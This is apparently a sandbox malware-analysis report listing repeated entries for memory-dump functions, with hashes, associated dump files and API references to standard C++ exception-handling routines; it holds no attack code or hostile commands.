Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: c18acc4e25fdabc8f529c897767c09c9b43deb3988b25cfcab3a50e98d7d205f
Instruction ID: 7f4b46400d6f1160aa93c457ff72a8e16f23ec24b7cf278fbd6c6e6bcf4d8702
Opcode Fuzzy Hash: c18acc4e25fdabc8f529c897767c09c9b43deb3988b25cfcab3a50e98d7d205f
Instruction Fuzzy Hash: 6BF027728052086AC300DF99D8429DB7FB85F11344F14C1AAE90C9BB90EB70E608C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE348F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE34918

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE3492D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE34926

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: 8d7e6455aab9f7acbc4b58a1186e6b047decc778aa297ab48abfec68e8b174df
Instruction ID: fa9d48f90389704d9b50e1a1fe83409834a13883ade6e1e94629b4becec4d021
Opcode Fuzzy Hash: 8d7e6455aab9f7acbc4b58a1186e6b047decc778aa297ab48abfec68e8b174df
Instruction Fuzzy Hash: 9BF082728112096FD704DF99D9429DA7BB8AF15344F20C26AE9099BB50EB30E608CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 6CE4E8D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE4E8F8

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE4E90D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE4E906

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: 0403321e891fb885d609fd40b974a00f3d827ef44fde487037e13126073ea9b4
Instruction ID: 395c727a1668b1eb4041822fc151c0fe91d035ebfc1c9ef9b86a34319c6a266b
Opcode Fuzzy Hash: 0403321e891fb885d609fd40b974a00f3d827ef44fde487037e13126073ea9b4
Instruction Fuzzy Hash: 11F027728052086AD700DF98E9029DABBB85F15304F14C1AAE84897B90EB30E608C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE4E850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE4E878

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE4E88D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE4E886

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: 9d7922cf4046c126f0171c83499e9af113cc0e98c997ab062148c41890256018
Instruction ID: 66a47a0caccda270875bad0aaa1437a94896956772f14d4186085bd36bddcc60
Opcode Fuzzy Hash: 9d7922cf4046c126f0171c83499e9af113cc0e98c997ab062148c41890256018
Instruction Fuzzy Hash: 39F0A772C152086AD701DF98E9429DA7FF85F15344F14C1AEE84997B50EB70E60887E5

Uniqueness

Uniqueness Score: -1.00%

Function 6CE4E980 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE4E9A8

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE4E9BD

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE4E9B6

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: 32ee7a0ce30a003682d78359a08a0773f9f7a459eb7735e4518b1e03f80d876b
Instruction ID: 315fc22d25ed3b305766963f34c0ed5f1dbea08d306884429acd51fa603a3254
Opcode Fuzzy Hash: 32ee7a0ce30a003682d78359a08a0773f9f7a459eb7735e4518b1e03f80d876b
Instruction Fuzzy Hash: A8F027728156086AC300DF98E8029DA7BB85F11344F14C1AAE8489BB90EB30E60887E1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE36B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE36B38

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE36B4D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE36B46

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: 158f4b660857d9c022814a552cd6df2fc74fe132c0013ff87448fa56dde7f184
Instruction ID: 3288d3f38e04e296e6e60c0792197e5cb8b80e0fc4ae5d5a9ab33076b4290abf
Opcode Fuzzy Hash: 158f4b660857d9c022814a552cd6df2fc74fe132c0013ff87448fa56dde7f184
Instruction Fuzzy Hash: 92F05E728112086AD700DF99D9429DA77B8AF55348F20C26AA94997A50EB30E608CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6CE3C420 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE3C448

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE3C45D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE3C456

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: 8bdff5a76c94c616321c7175b95cea60f586e436ed0100f11f7034dfae61d656
Instruction ID: e7583f237e6a865251d400e6affddede65dd5bfd1ef8608f73e2cd8a9f5c57e9
Opcode Fuzzy Hash: 8bdff5a76c94c616321c7175b95cea60f586e436ed0100f11f7034dfae61d656
Instruction Fuzzy Hash: 4FF089729102186FD700DF99D9019DA77B89F15744F10C26AD80D67B50EB30F618CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6CE36740 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE36768

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE3677D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE36776

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: 883e7c27834422d7277405c6bd6bbebad73b395e3198f6654fdb0254792dff2a
Instruction ID: 29aafa729d908724a0319f45d2833c4e2d33c21c2a08ca20d096a7ee8e551505
Opcode Fuzzy Hash: 883e7c27834422d7277405c6bd6bbebad73b395e3198f6654fdb0254792dff2a
Instruction Fuzzy Hash: 73F02E728052086BC300DFA8D9429DA7BBC5F11344F14C1A9D80C97B50EB30E608C7E5

Uniqueness

Uniqueness Score: -1.00%

Function 6CE341B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE341D8

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE341ED

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE341E6

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: 1a9c799b5be63a1724b22bb50e78447e10fdb3036677e7d6676c876cc414065e
Instruction ID: 8d065d85a334015ebc5cdd66b58782707ad58862b63b2475e7277accfc7d426a
Opcode Fuzzy Hash: 1a9c799b5be63a1724b22bb50e78447e10fdb3036677e7d6676c876cc414065e
Instruction Fuzzy Hash: 5CF082738142186BD700DF99D9029DA7BB8AF15344F20C26AE909A7B50EB31E608CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE3C3A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE3C3C8

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE3C3DD

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE3C3D6

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: d4b1dc564371cd3ec6ff235e1183ea0a24e9c5d6732aecca1c054514fd4a1ae5
Instruction ID: e87606eb0cbe970ab4f903fa88ab09689b7194bad1792c22abb5ee6593957416
Opcode Fuzzy Hash: d4b1dc564371cd3ec6ff235e1183ea0a24e9c5d6732aecca1c054514fd4a1ae5
Instruction Fuzzy Hash: 90F089729152186BD700DF99D9419DA77B8AF55744F20C2AAE8099B750EB30F604CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE25CE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE25D08

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE25D1D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE25D16

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: e828f3e04278d217675c150b70c366675e7a436a1d8bacb1ac65cdda3c54b198
Instruction ID: eb2abfb9ed8afae67df61b16c3623edd67e1eed8841750dc752f8e41af21a843
Opcode Fuzzy Hash: e828f3e04278d217675c150b70c366675e7a436a1d8bacb1ac65cdda3c54b198
Instruction Fuzzy Hash: AEF089728111086FD700DF99D901ADB77B89F15344F10C16AE80997750EB30E6048BA5

Uniqueness

Uniqueness Score: -1.00%

Function 6CE25C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE25C58

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE25C6D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE25C66

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: d6a220fead94e2276b7ff7987bd28b4ad4764038b6f99cb4e9c87d84b9b80b83
Instruction ID: d997c58633e480142ba71f627565de287b5f5f8bfebcda0384735c5136f46064
Opcode Fuzzy Hash: d6a220fead94e2276b7ff7987bd28b4ad4764038b6f99cb4e9c87d84b9b80b83
Instruction Fuzzy Hash: C7F089728111086FD700DF99D9429DA77BC9F15344F10C16ED80957B54FB30E6048BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE25D90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE25DB8

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE25DCD

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE25DC6

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
